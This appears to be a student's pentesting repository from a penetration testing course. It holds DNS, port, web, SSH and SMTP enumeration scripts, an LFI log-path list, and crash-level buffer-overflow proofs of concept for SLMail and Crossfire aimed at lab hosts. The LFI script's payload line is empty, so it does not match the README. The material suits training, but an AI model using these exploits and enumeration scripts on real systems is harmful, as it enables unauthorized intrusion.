├── DNSforward.sh ├── DNSreverse.sh ├── DNStransfer.sh ├── README.md ├── Slfuzzed.py ├── Slfuzzer.py ├── crossfire-poc.py ├── lfi.txt ├── lfitest.sh ├── portscanner.py ├── powersweep.ps1 ├── ssh-test.sh ├── vrfy.py └── webserver_enum.py /DNSforward.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # DNS forward lookup script for PWK course 3 | 4 | 5 | for subdomain in $(cat list.txt); do 6 | host $subdomain.megacorpone.com | grep "has address"| cut -d " " -f 1,4 7 | done 8 | -------------------------------------------------------------------------------- /DNSreverse.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # DNS reverse lookup script for PWK 3 | for ip in $(seq 72 91); do 4 | host -t ptr 38.100.193.$ip | grep "megacorpone" | cut -d " " -f 1,5 5 | done 6 | -------------------------------------------------------------------------------- /DNStransfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # DNS Zone transfer script for PWK 3 | 4 | if [ -z "$1" ]; then 5 | 6 | echo "[*] Simple Zone transfer script" 7 | echo "[*] Usage: $0 " 8 | exit 0 9 | fi 10 | 11 | for ns in $(host -t ns $1| cut -d " " -f 4); do 12 | host -l megacorpone.com $ns | grep " has address" 13 | done 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | <#pentesting> 2 | ------------ 3 | Scripts for enumeration. 4 | 5 | Change ip before running 6 | 7 | 8 | portscanner.py: 9 | -------------- 10 | Simple port scanner that uses threads to work faster. Scans TCP and UDP ports. Just tells you what ports are open really quick 11 | 12 | powersweep.ps1: 13 | -------------- 14 | Ping sweeper in Powershell. 15 | 16 | webserver_enum.py: 17 | ----------------- 18 | Scans ports on an IP or range of IPs to identify if there are any webservers running. 19 | 20 | DNSforward.sh: 21 | ------------- 22 | 23 | DNS forward lookup script to find IP addresses of a websites subdomain 24 | 25 | Requires : list.txt - file that contains a list of domain names to check 26 | 27 | Requires : host - linux command line tool to resolve domain names 28 | 29 | 30 | DNSreverse.sh: 31 | ------------- 32 | 33 | DNS reverse lookup script to find domain names associated with ip addresses 34 | 35 | Requires: host - linux command line tool to resolve domain names 36 | 37 | 38 | DNStransfer.sh: 39 | -------------- 40 | 41 | DNS zone transfer script to demonstrate a zone transfer from a domains name server 42 | 43 | Arguments: Domain name 44 | 45 | Requires: host - linux command line tool to resolve domain names 46 | 47 | Slfuzzer.py: 48 | ----------- 49 | 50 | Python fuzzer for SL mail application to check for buffer overflow vulnerability 51 | 52 | Modifications: change ip and port number for socket connection before running 53 | 54 | SLfuzzed.py: 55 | ----------- 56 | 57 | Working python proof-of-concept code for buffer overflow vulnerability in SLmail application 58 | 59 | Modifications: change ip and port number for socket connection before running 60 | 61 | crossfire-poc.py: 62 | ---------------- 63 | 64 | working python proof-of-concept code for buffer overflow vulnerability in Crossfire game for linux 65 | 66 | Modifications: change ip and port number for socket connection before runnning 67 | 68 | lfitest.sh: 69 | ---------- 70 | 71 | Bash script that prints out php shell_exec code for a given list of log file paths 72 | 73 | Requires: lfi.txt - file that contains list of known paths for log files 74 | 75 | lfi.txt: 76 | ------- 77 | 78 | File that contains a list of known paths for log files for both linux and windows 79 | 80 | vrfy.py: 81 | ------- 82 | 83 | Python script to enumerate username in SMTP server using vrfy command 84 | 85 | Modifications: change ip and port number for socket connection before running 86 | 87 | -------------------------------------------------------------------------------- /Slfuzzed.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # SL mail buffer overflow exploit 3 | import socket 4 | 5 | #badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 6 | 7 | 8 | buffer = "A"*2606 + "B"*4 +"C"* (3500-2606-4) 9 | 10 | 11 | try: 12 | print "Sending evil buffer" 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | connect = s.connect(("10.11.20.130",110)) 16 | data = s.recv(1024) 17 | s.send("USER test\r\n") 18 | data = s.recv(1024) 19 | s.send("PASS " + buffer + "\r\n") 20 | print "\nDone!" 21 | except: 22 | print "Could not conenct " 23 | 24 | 25 | -------------------------------------------------------------------------------- /Slfuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # SLMail fuzzer to check for buffer overflow 3 | import socket 4 | 5 | buffer = ["A"] 6 | counter = 100 7 | while len(buffer) <= 30: 8 | buffer.append("A"*counter) 9 | counter += 200 10 | 11 | for string in buffer: 12 | print "Fuzzing pass with %s bytes" % len(string) 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | 16 | #print "\nSending buffer.." 17 | connect = s.connect(('10.11.20.130',110)) 18 | s.recv(1024) 19 | #print data 20 | 21 | s.send("USER test" + "\r\n") 22 | s.recv(1024) 23 | #print data 24 | 25 | s.send("PASS"+ string +"\r\n") 26 | s.recv(1024) 27 | #print data 28 | 29 | s.send("QUIT\r\n") 30 | s.close() 31 | 32 | #print "could not connect" 33 | 34 | 35 | -------------------------------------------------------------------------------- /crossfire-poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Proof of concept for Crossfire game 4 | # Buffer overflow vulnerability 5 | 6 | import socket 7 | 8 | host = "127.0.0.1" 9 | 10 | crash = "\x41" * 4379 11 | 12 | buffer = "\x11(setup sound " + crash + "\x90\x00#" 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | 16 | print "[*]Sending evil buffer..." 17 | s.connect((host,13327)) 18 | s.send(buffer) 19 | data=s.recv(1024) 20 | print data 21 | s.close() 22 | print "[*]Payload Sent!" 23 | 24 | -------------------------------------------------------------------------------- /lfi.txt: -------------------------------------------------------------------------------- 1 | /etc/httpd/logs/access.log 2 | /etc/httpd/logs/access_log 3 | /etc/httpd/logs/error.log 4 | /etc/httpd/logs/error_log 5 | /opt/lampp/logs/access_log 6 | /opt/lampp/logs/error_log 7 | /usr/local/apache/log/usr/local/apache/logs/usr/local/apache/logs/access.log 8 | /usr/local/apache/logs/access_log 9 | /usr/local/apache/logs/error.log 10 | /usr/local/apache/logs/error_log 11 | /usr/local/etc/httpd/logs/access_log 12 | /usr/local/etc/httpd/logs/error_log 13 | /usr/local/www/logs/thttpd_log 14 | /var/apache/logs/access_log 15 | /var/apache/logs/error_log 16 | /var/log/apache/access.log 17 | /var/log/apache/error.log 18 | /var/log/apache-ssl/access.log 19 | /var/log/apache-ssl/error.log 20 | /var/log/httpd/access_log 21 | /var/log/httpd/error_log 22 | /var/log/httpsd/ssl.access_log 23 | /var/log/httpsd/ssl_log 24 | /var/log/thttpd_log 25 | /var/www/log/access_log 26 | /var/www/log/error_log 27 | /var/www/logs/access.log 28 | /var/www/logs/access_log 29 | /var/www/logs/error.log 30 | /var/www/logs/error_log 31 | C:\apache\logs\access.log 32 | C:\apache\logs\error.log 33 | C:\Program Files\Apache Group\Apache\logs\access.log 34 | C:\Program Files\Apache Group\Apache\logs\error.log 35 | C:\program files\wamp\apache2\logs 36 | C:\wamp\apache2\logs 37 | C:\wamp\logs 38 | C:\xampp\apache\logs\access.log 39 | C:\xampp\apache\logs\error.log 40 | -------------------------------------------------------------------------------- /lfitest.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # script that tests for known log files 3 | # to access when testing for local file inclusion vulnerabilities 4 | # file : lfi.txt 5 | # contains a list of known paths for log files 6 | for line in $(cat lfi.txt);do echo "" >> lfiout.txt 7 | done 8 | 9 | -------------------------------------------------------------------------------- /portscanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | # File : portscanner.py 5 | # Author : Pranat Dayal 6 | # Simple port scanner in python. 7 | 8 | 9 | import sys 10 | import socket 11 | import threading 12 | 13 | # Initiates a TCP connection with the provided port and IP 14 | def tcp_conn(ip,port): 15 | 16 | sock_t=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 17 | sock_t.settimeout(0.5) 18 | try: 19 | 20 | output=sock_t.connect_ex((ip,port)) 21 | if output==0: 22 | print "TCP Port {}: Open".format(port) 23 | sock_t.close() 24 | except Exception as e: 25 | pass 26 | 27 | # Sends a UDP datagram to a specific port 28 | def udp_scan(ip,port): 29 | data = "test" 30 | sock_u=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) 31 | try: 32 | sock_u.sendto(data,(ip,port)) 33 | sock_u.settimeout(1.0) 34 | output = sock_u.recvfrom(1024) 35 | 36 | if output!=None: 37 | print "UDP Port {}: Open".format(port) 38 | 39 | except Exception as e: 40 | pass 41 | 42 | # Spawns an individual thread for the top 1024 ports 43 | # Scans both udp and tcp 44 | # Change 1024 to the number of ports you wanna scan 45 | def scan_ports(ip): 46 | threads_tcp = [] 47 | threads_udp = [] 48 | for i in range(1024): 49 | t = threading.Thread(target=tcp_conn, args=(ip,i)) 50 | u = threading.Thread(target=udp_scan, args=(ip,i)) 51 | threads_tcp.append(t) 52 | threads_udp.append(u) 53 | 54 | for i in range(1024): 55 | threads_tcp[i].start() 56 | threads_udp[i].start() 57 | for i in range(1024): 58 | threads_tcp[i].join() 59 | threads_udp[i].join() 60 | 61 | 62 | if __name__=="__main__": 63 | 64 | target = sys.argv[1] 65 | print "Target IP : ", target 66 | try: 67 | scan_ports(target) 68 | except Exception as e: 69 | pass 70 | 71 | 72 | -------------------------------------------------------------------------------- /powersweep.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | 4 | Powershell ping sweeper 5 | 6 | .PARAMETERS 7 | 8 | ipaddress : Provide a range of IP address (CIDR Accepted) 9 | 10 | #> 11 | 12 | 13 | # Main function that gets called. Requires a CIDR ip range or "-" seperated start and end IP range 14 | 15 | function powersweep(){ 16 | 17 | 18 | [CmdletBinding()] 19 | Param 20 | ( 21 | [parameter(mandatory=$true,valuefrompipeline=$true,helpmessage="Example : 192.168.1.1 or 192.168.1.0/24 or 192.168.1.1-192.168.1.20")] 22 | [string]$ipaddress 23 | 24 | ) 25 | 26 | Write-Output "IP address: $ipaddress" 27 | 28 | # Detects CIDR 29 | if ($ipaddress -match "\/") 30 | { 31 | 32 | 33 | Write-Output "CIDR detected" 34 | #splits it up into start and end 35 | $startIP= Get-IPV4NetworkStartIP($ipaddress) 36 | $endIP = Get-IPV4NetworkEndIP($ipaddress) 37 | 38 | } 39 | # Detects range 40 | elseif ($ipaddress -match "\-") 41 | { 42 | 43 | Write-Output "Range Detected" 44 | #casts to IP address type 45 | $startIP=[System.Net.IPAddress]$ipaddress.Split("-")[0] 46 | $endIP=[System.Net.IPAddress]$ipaddress.Split("-")[1] 47 | 48 | } 49 | Write-Output "$startIP : $endIP" 50 | 51 | #calls a parallel workflow and searches for lines with ttl 52 | ParallelSweep -startip $startIP -endip $endIP | select-string ttl 53 | } 54 | 55 | # Gets the start IP from a CIDR network 56 | 57 | Function Get-IPV4NetworkStartIP ($strNetwork) 58 | { 59 | $StrNetworkAddress = ($strNetwork.split("/"))[0] 60 | $NetworkIP = ([System.Net.IPAddress]$StrNetworkAddress).GetAddressBytes() 61 | [Array]::Reverse($NetworkIP) 62 | $NetworkIP = ([System.Net.IPAddress]($NetworkIP -join ".")).Address 63 | $StartIP = $NetworkIP +1 64 | #Convert To Double 65 | If (($StartIP.Gettype()).Name -ine "double") 66 | { 67 | $StartIP = [Convert]::ToDouble($StartIP) 68 | } 69 | $StartIP = [System.Net.IPAddress]$StartIP 70 | Return $StartIP 71 | } 72 | 73 | 74 | # Gets the end IP from a CIDR network 75 | Function Get-IPV4NetworkEndIP ($strNetwork) 76 | { 77 | $StrNetworkAddress = ($strNetwork.split("/"))[0] 78 | [int]$NetworkLength = ($strNetwork.split("/"))[1] 79 | $IPLength = 32-$NetworkLength 80 | $NumberOfIPs = ([System.Math]::Pow(2, $IPLength)) -1 81 | $NetworkIP = ([System.Net.IPAddress]$StrNetworkAddress).GetAddressBytes() 82 | [Array]::Reverse($NetworkIP) 83 | $NetworkIP = ([System.Net.IPAddress]($NetworkIP -join ".")).Address 84 | $EndIP = $NetworkIP + $NumberOfIPs 85 | If (($EndIP.Gettype()).Name -ine "double") 86 | { 87 | $EndIP = [Convert]::ToDouble($EndIP) 88 | 89 | } 90 | $EndIP = [System.Net.IPAddress]$EndIP 91 | Return $EndIP 92 | } 93 | 94 | 95 | 96 | # Gets start and end network addresses (not including host octet) 97 | Function Get-network($startip ,$endip) 98 | { 99 | 100 | $network_s = @() 101 | $network_e = @() 102 | 103 | $startaddr = $startip.IPAddressToString 104 | $endaddr = $endip.IPAddressToString 105 | 106 | # $octets_s=@() 107 | # $octets_e=@() 108 | 109 | $octets_s = $startaddr.Split("{.}") 110 | 111 | $octets_e = $endaddr.Split("{.}") 112 | 113 | $startnum = $startaddr.Split("{.}")[3] 114 | $endnum = $endaddr.Split("{.}")[3] 115 | 116 | # Write-Output $octets_s 117 | 118 | for($i=0;$i -lt 3;$i++){ 119 | 120 | $network_s += $octets_s[$i]+"." 121 | $network_e += $octets_e[$i]+"." 122 | } 123 | 124 | return $network_s ,$network_e 125 | } 126 | 127 | 128 | 129 | 130 | # USELESS 131 | # gets a list of subnets 132 | # - not really. Im keeping it incase i realise what i was trying to do 133 | <# 134 | Function Get-subnets($startip,$endip) 135 | { 136 | 137 | $startaddr=$startip.IPAddressToString 138 | $endaddr=$endip.IPAddressToString 139 | 140 | $out = "False" 141 | 142 | $subnets=@() 143 | 144 | if($startaddr -le $endaddr){ 145 | for($i=0;$i -lt 4;$i++) 146 | { 147 | for($k=0;$k -lt 4;$k++) 148 | { 149 | 150 | if($startaddr[$i] -lt $endaddr[$k]) 151 | { 152 | $subnets+=$startaddr 153 | } 154 | 155 | } 156 | 157 | } 158 | 159 | } 160 | else 161 | { 162 | $out = "no" 163 | } 164 | return $subnets 165 | 166 | } 167 | #> 168 | 169 | # Work flow to ping ip addresses 170 | workflow ParallelSweep 171 | { 172 | 173 | Param( 174 | [System.Net.IPAddress]$startip, 175 | [System.Net.IPAddress]$endip 176 | 177 | ) 178 | 179 | #$subnets=Get-subnets $startip $endip 180 | 181 | #Write-Output $subnets 182 | 183 | $network_sub= Get-network -startip $startip -endip $endip 184 | 185 | $network_start = $network_sub[0] 186 | $network_end = $network_sub[1] 187 | 188 | $endaddr = $endip.IPAddressToString 189 | $endhost = $endaddr.Split("{.}")[3] 190 | 191 | 192 | #$network = $subnets[0]+$subnets[1]+$subnets[2] 193 | #Write-Output $network 194 | 195 | 196 | 197 | foreach -parallel -throttlelimit 4 ($i in 0..$endhost) 198 | 199 | { 200 | $newnet = $network_start+$i -join "" 201 | ping -n 1 -w 100 $newnet 202 | 203 | if ($network_start -ne $network_end) 204 | { 205 | 206 | $endnet = $network_end+$i -join "" 207 | ping -n 1 -w 100 $endnet 208 | 209 | } 210 | } 211 | 212 | } 213 | 214 | powersweep -ipaddress 192.168.1.0-192.168.1.40 -------------------------------------------------------------------------------- /ssh-test.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm ssh_ok no_ssh no_auth ssh_up other 4 | 5 | while read ip host ; do 6 | 7 | # status=$(ssh -o BatchMode=yes -o ConnectTimeout=5 $ip echo ok 2>&1) 8 | 9 | status=$(ssh -o BatchMode=yes -o StrictHostKeyChecking=no -o ConnectTimeout=5 $ip echo ok 2>&1) 10 | case $status in 11 | ok) echo $ip $host >> ssh_ok ;; 12 | *"No route to host"*) echo $ip $host $status >> no_ssh ;; 13 | *"Permission denied"*) echo $ip $host $status >> no_auth ;; 14 | *"Host key verification failed"*) echo $ip $host $status >> ssh_up;; 15 | *) echo $ip $host $status >> other ;; 16 | esac 17 | 18 | done < ip.list 19 | -------------------------------------------------------------------------------- /vrfy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # SMPT username enumeration (VRFY) script 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) !=2: 7 | print "Usage: vrfy.py " 8 | sys.exit(0) 9 | 10 | #create socket 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | #connect to socket 13 | connect = s.connect(('10.11.1.217',25)) 14 | #receive banner 15 | banner = s.recv(1024) 16 | print banner 17 | #VRFY user 18 | s.send('VRFY ' + sys.argv[1] + '\r\n') 19 | result = s.recv(1024) 20 | print result 21 | #close the socket 22 | s.close() 23 | -------------------------------------------------------------------------------- /webserver_enum.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # File : webserver_enum.py 4 | # Makes HTTP GET requests to various common ports 5 | # to find a list of webservers 6 | 7 | # Accepts CIDR Input 8 | # Command line usage : python webserver_enum.py 192.168.1.0/24 0-1024 9 | 10 | 11 | import socket 12 | import sys 13 | import httplib 14 | import threading 15 | import ipaddress 16 | 17 | RESPONSE_CODES = [200 # Success 18 | ,301 # Permanent redirect 19 | ,302 # Temporary redirect 20 | ,304 # Not modified 21 | ,403 # Forbidden 22 | ,404 # Page not found 23 | ,500 # Server side error] 24 | 25 | # common ports for http 26 | DEFAULT_PORTS = [80,8080,3000,3001,1337,9393] 27 | 28 | # input ports - only use if port specifications are provided 29 | INPUT_PORTS = [] 30 | 31 | 32 | # final list of webserver scan results 33 | WEBSERVER_IP=[] 34 | 35 | # checks for http service 36 | def http_port_scan(ip,port): 37 | h = httplib.HTTPConnection(ip,port,timeout=0.1) 38 | status = False 39 | 40 | try: 41 | h.request('GET','/') 42 | r = h.getresponse() 43 | msg = str(r.reason) + ' ' + str(r.status) 44 | 45 | if r.status in RESPONSE_CODES: 46 | status = True 47 | except socket.error, e: 48 | msg = e.strerror 49 | except: 50 | msg = 'Unexpected error' 51 | return status, ip + ':' + str(port) + ' ' + str(msg) 52 | 53 | 54 | 55 | 56 | # Scanning results 57 | def scan_r(ip, port): 58 | global WEBSERVER_IP 59 | result = http_port_scan(ip,port) 60 | # print result 61 | if result[0]==True: 62 | print " [!] Webserver at: : " ,ip,port 63 | print result 64 | WEBSERVER_IP.append(result) 65 | return True 66 | 67 | 68 | 69 | # Scanning threads 70 | def scan_t(ip,ports=DEFAULT_PORTS): 71 | 72 | threads = [] 73 | for i in range(len(ports)): 74 | t = threading.Thread(target=scan_r, args=(ip,ports[i])) 75 | threads.append(t) 76 | 77 | for i in range(len(ports)): 78 | threads[i].start() 79 | for i in range(len(ports)): 80 | threads[i].join() 81 | 82 | 83 | 84 | 85 | def main(): 86 | 87 | global WEBSERVER_IP 88 | 89 | ports=DEFAULT_PORTS 90 | 91 | global INPUT_PORTS 92 | 93 | if len(sys.argv) == 1: 94 | iprange = raw_input("Enter IP range (CIDR) : ") 95 | iprange_d = iprange.decode("utf-8") 96 | 97 | elif len(sys.argv)==2: 98 | iprange_d = sys.argv[1].decode("utf-8") 99 | 100 | elif len(sys.argv)==3: 101 | iprange_d = sys.argv[1].decode("utf-8") 102 | if sys.argv[2]: 103 | ports= sys.argv[2] 104 | 105 | if "-" in ports: 106 | range_p = ports.split("-") 107 | start_p = range_p[0] 108 | end_p = range_p[1] 109 | print "port range: ", start_p,end_p 110 | for i in range(int(start_p),int(end_p)): 111 | INPUT_PORTS.append(i) 112 | 113 | ports = INPUT_PORTS 114 | 115 | net = ipaddress.ip_network(iprange_d) 116 | 117 | for ip in net: 118 | print "[*] Checking Target : ", ip 119 | addr = str(ip) 120 | scan_t(addr,ports) 121 | 122 | print WEBSERVER_IP 123 | 124 | 125 | 126 | main() 127 | 128 | 129 | --------------------------------------------------------------------------------